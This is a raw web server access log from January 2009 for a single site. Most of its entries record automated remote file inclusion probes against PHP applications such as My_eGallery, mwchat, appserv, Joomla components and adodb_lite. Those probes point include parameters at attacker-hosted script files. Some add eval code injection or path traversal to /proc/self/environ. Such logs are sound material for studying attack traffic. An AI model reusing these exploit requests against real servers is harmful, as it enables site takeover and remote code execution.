85.214.79.241 - - [06/Jan/2009:08:09:53 -0800] "GET /logs/access_080723.log/errors.php?error=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:08:09:53 -0800] "GET /logs/access_080513.log//mwchat/libs/errors.php?error=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:08:09:54 -0800] "GET /mwchat/libs/errors.php?error=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:08:09:54 -0800] "GET /logs//mwchat/libs/errors.php?error=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
8.7.26.27 - - [06/Jan/2009:08:09:56 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
8.7.26.27 - - [06/Jan/2009:08:09:56 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
8.7.26.27 - - [06/Jan/2009:08:10:02 -0800] "GET /logs/access_080928.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.v13.50webs.com/iddd.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
200.199.205.47 - - [06/Jan/2009:08:10:05 -0800] "GET /logs/access_080303.log/errors.php?error=http://www.caverna.kit.net/z1.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
200.199.205.47 - - [06/Jan/2009:08:10:16 -0800] "GET /logs/access_080226.log/errors.php?error=http://www.caverna.kit.net/z1.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
91.121.65.125 - - [06/Jan/2009:08:10:34 -0800] "GET ///?_PHPLIB[libdir]=http://www.vampirewear.com/11.gif??? HTTP/1.1" 200 94768 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:10:35 -0800] "GET /logs/access_080719.log/index.php?option=com_artbannersplus&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:10:36 -0800] "GET /index.php?option=com_artbannersplus&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 95204 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:10:36 -0800] "GET /logs/index.php?option=com_artbannersplus&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.115.213.189 - - [06/Jan/2009:08:10:47 -0800] "GET /logs/access_081207.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.36.165.22 - - [06/Jan/2009:08:10:49 -0800] "GET /logs/access_080425.log//mwchat/libs/errors.php?error=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
211.115.213.189 - - [06/Jan/2009:08:10:58 -0800] "GET /logs/access_081207.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.89.31.157 - - [06/Jan/2009:08:10:59 -0800] "GET /logs/access_080430.log//?path%5Bdocroot%5D=http://www.geocities.com/xzfru/perl/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.157 - - [06/Jan/2009:08:10:59 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.geocities.com/xzfru/perl/id.txt???? HTTP/1.1" 200 81177 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.157 - - [06/Jan/2009:08:11:00 -0800] "GET /?path%5Bdocroot%5D=http://www.geocities.com/xzfru/perl/id.txt???? HTTP/1.1" 200 94854 "-" "libwww-perl/5.812" "www.dmulk.com"
77.221.130.16 - - [06/Jan/2009:08:11:01 -0800] "GET /logs/access_081207.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.leegolf.com/vboard/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.16 - - [06/Jan/2009:08:11:02 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.leegolf.com/vboard/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.16 - - [06/Jan/2009:08:11:02 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.leegolf.com/vboard/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.213.189 - - [06/Jan/2009:08:11:04 -0800] "GET /logs/access_080404.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.199.205.47 - - [06/Jan/2009:08:11:08 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.caverna.kit.net/z1.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
200.199.205.47 - - [06/Jan/2009:08:11:08 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.caverna.kit.net/z1.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
200.199.205.47 - - [06/Jan/2009:08:11:08 -0800] "GET /logs/access_080905.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.caverna.kit.net/z1.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
211.115.213.189 - - [06/Jan/2009:08:11:16 -0800] "GET /logs/access_080404.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.141.37.54 - - [06/Jan/2009:08:11:17 -0800] "GET /logs/access_081125.log/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.37.54 - - [06/Jan/2009:08:11:18 -0800] "GET /logs/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.157 - - [06/Jan/2009:08:11:18 -0800] "GET /logs/access_080304.log//?path%5Bdocroot%5D=http://www.geocities.com/xzfru/perl/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
221.143.46.163 - - [06/Jan/2009:08:11:57 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.46.163 - - [06/Jan/2009:08:11:58 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.127.68 - - [06/Jan/2009:08:12:02 -0800] "GET /logs/access_080509.log//modules/My_eGallery/public/displayCategory.php?basepath=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
211.115.127.68 - - [06/Jan/2009:08:12:02 -0800] "GET /logs/access_080509.log/errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
211.115.127.68 - - [06/Jan/2009:08:12:03 -0800] "GET /logs/access_080509.log//modules/My_eGallery/public/displayCategory.php?basepath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
211.115.127.68 - - [06/Jan/2009:08:12:03 -0800] "GET /logs/access_080509.log//modules/My_eGallery/public/displayCategory.php?basepath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
200.57.157.27 - - [06/Jan/2009:08:12:20 -0800] "GET /logs/access_080507.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.leegolf.com/vboard/data/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
200.57.157.27 - - [06/Jan/2009:08:12:20 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.leegolf.com/vboard/data/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
200.57.157.27 - - [06/Jan/2009:08:12:20 -0800] "GET /logs/access_080401.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.leegolf.com/vboard/data/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
200.199.205.47 - - [06/Jan/2009:08:12:21 -0800] "GET /logs/access_080928.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.caverna.kit.net/z1.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
200.57.157.27 - - [06/Jan/2009:08:12:24 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.leegolf.com/vboard/data/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:12:26 -0800] "GET /logs/access_080911.log/index.php?option=com_poll&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.115.111.245 - - [06/Jan/2009:08:12:34 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
200.57.157.27 - - [06/Jan/2009:08:12:36 -0800] "GET /logs/access_080507.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.leegolf.com/vboard/data/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
200.57.157.27 - - [06/Jan/2009:08:12:36 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.leegolf.com/vboard/data/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
200.57.157.27 - - [06/Jan/2009:08:12:36 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.leegolf.com/vboard/data/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
200.57.157.27 - - [06/Jan/2009:08:12:36 -0800] "GET /logs/access_080401.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.leegolf.com/vboard/data/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
222.236.44.69 - - [06/Jan/2009:08:12:41 -0800] "GET /logs/access_081207.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.elquiche.com/elquiche/chat//inc/cmses/bajo-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.236.44.69 - - [06/Jan/2009:08:12:42 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.elquiche.com/elquiche/chat//inc/cmses/bajo-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.236.44.69 - - [06/Jan/2009:08:12:42 -0800] "GET /logs/access_081207.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.elquiche.com/elquiche/chat//inc/cmses/bajo-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.236.44.69 - - [06/Jan/2009:08:12:42 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.elquiche.com/elquiche/chat//inc/cmses/bajo-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.236.44.69 - - [06/Jan/2009:08:12:43 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.elquiche.com/elquiche/chat//inc/cmses/bajo-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.236.44.69 - - [06/Jan/2009:08:12:43 -0800] "GET /logs/access_080702.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.elquiche.com/elquiche/chat//inc/cmses/bajo-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.236.44.69 - - [06/Jan/2009:08:12:43 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.elquiche.com/elquiche/chat//inc/cmses/bajo-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.236.44.69 - - [06/Jan/2009:08:12:43 -0800] "GET /logs/access_080702.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.elquiche.com/elquiche/chat//inc/cmses/bajo-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.0.252.2 - - [06/Jan/2009:08:12:55 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.252.2 - - [06/Jan/2009:08:12:55 -0800] "GET /logs/access_080530.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.252.2 - - [06/Jan/2009:08:12:55 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
205.234.98.254 - - [06/Jan/2009:08:13:06 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.199.205.47 - - [06/Jan/2009:08:13:06 -0800] "GET /logs/access_080303.log/errors.php?error=http://www.caverna.kit.net/z1.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
72.51.33.38 - - [06/Jan/2009:08:13:16 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.199.205.47 - - [06/Jan/2009:08:13:17 -0800] "GET /logs/access_080226.log/errors.php?error=http://www.caverna.kit.net/z1.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
67.15.58.12 - - [06/Jan/2009:08:13:20 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.199.205.47 - - [06/Jan/2009:08:13:22 -0800] "GET /logs/access_080303.log/errors.php?error=http://www.caverna.kit.net/z1.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
200.199.205.47 - - [06/Jan/2009:08:13:31 -0800] "GET /logs/access_080226.log/errors.php?error=http://www.caverna.kit.net/z1.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
72.55.148.109 - - [06/Jan/2009:08:13:32 -0800] "GET /logs/access_080722.log/index.php?option=com_artbannersplus&task=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.218.155.124 - - [06/Jan/2009:08:13:33 -0800] "GET /logs/access_081114.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.218.155.124 - - [06/Jan/2009:08:13:33 -0800] "GET /logs/access_081114.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.218.155.124 - - [06/Jan/2009:08:13:33 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.218.155.124 - - [06/Jan/2009:08:13:33 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.218.155.124 - - [06/Jan/2009:08:13:33 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.218.155.124 - - [06/Jan/2009:08:13:33 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.218.155.124 - - [06/Jan/2009:08:13:34 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
94.103.80.70 - - [06/Jan/2009:08:13:35 -0800] "GET /?REX[INCLUDE_PATH]=http://portal.morpace.com/portal/demo/templates/id5.txt? HTTP/1.1" 200 94924 "-" "libwww-perl/5.79" "www.dmulk.com"
66.160.185.20 - - [06/Jan/2009:08:13:42 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.21.69.243 - - [06/Jan/2009:08:13:45 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
80.67.19.122 - - [06/Jan/2009:08:13:52 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.16 - - [06/Jan/2009:08:14:04 -0800] "GET /logs/access_081207.log//modules/My_eGallery/public/displayCategory.php?basepath=http://gugakedu.co.kr/kboard//aid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.16 - - [06/Jan/2009:08:14:04 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://gugakedu.co.kr/kboard//aid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.16 - - [06/Jan/2009:08:14:05 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://gugakedu.co.kr/kboard//aid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.98.254 - - [06/Jan/2009:08:14:50 -0800] "GET /logs/access_081112.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
205.234.98.254 - - [06/Jan/2009:08:14:50 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
205.234.98.254 - - [06/Jan/2009:08:14:54 -0800] "GET /logs/access_081005.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.15.58.12 - - [06/Jan/2009:08:15:10 -0800] "GET /logs/access_081112.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.15.58.12 - - [06/Jan/2009:08:15:10 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.51.33.38 - - [06/Jan/2009:08:15:11 -0800] "GET /logs/access_081112.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.51.33.38 - - [06/Jan/2009:08:15:11 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
78.109.17.146 - - [06/Jan/2009:08:15:22 -0800] "GET /logs/access_081027.log//?DOCUMENT_ROOT=http://www.lazar.ru/manager/processors/copyleft.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
78.109.17.146 - - [06/Jan/2009:08:15:23 -0800] "GET /logs/access_081027.log//?DOCUMENT_ROOT=http://www.lazar.ru/manager/processors/copyleft.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
78.109.17.146 - - [06/Jan/2009:08:15:24 -0800] "GET /?DOCUMENT_ROOT=http://www.lazar.ru/manager/processors/copyleft.txt?? HTTP/1.1" 200 94847 "-" "libwww-perl/5.811" "www.dmulk.com"
78.109.17.146 - - [06/Jan/2009:08:15:24 -0800] "GET /?DOCUMENT_ROOT=http://www.lazar.ru/manager/processors/copyleft.txt?? HTTP/1.1" 200 94799 "-" "libwww-perl/5.811" "www.dmulk.com"
78.109.17.146 - - [06/Jan/2009:08:15:26 -0800] "GET /logs//?DOCUMENT_ROOT=http://www.lazar.ru/manager/processors/copyleft.txt?? HTTP/1.1" 200 81177 "-" "libwww-perl/5.811" "www.dmulk.com"
78.109.17.146 - - [06/Jan/2009:08:15:26 -0800] "GET /logs//?DOCUMENT_ROOT=http://www.lazar.ru/manager/processors/copyleft.txt?? HTTP/1.1" 200 81177 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.58.12 - - [06/Jan/2009:08:15:28 -0800] "GET /logs/access_081005.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.30.81.169 - - [06/Jan/2009:08:15:28 -0800] "GET /logs/access_081029.log HTTP/1.0" 200 4837143 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
148.245.102.115 - - [06/Jan/2009:08:15:28 -0800] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
148.245.102.115 - - [06/Jan/2009:08:15:28 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
148.245.102.115 - - [06/Jan/2009:08:15:28 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
193.218.155.124 - - [06/Jan/2009:08:15:34 -0800] "GET /logs/access_081112.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
193.218.155.124 - - [06/Jan/2009:08:15:34 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
81.21.69.243 - - [06/Jan/2009:08:15:35 -0800] "GET /logs/access_081112.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
81.21.69.243 - - [06/Jan/2009:08:15:35 -0800] "GET /appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.51.33.38 - - [06/Jan/2009:08:15:47 -0800] "GET /logs/access_081005.log/appserv/main.php?appserv_root=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
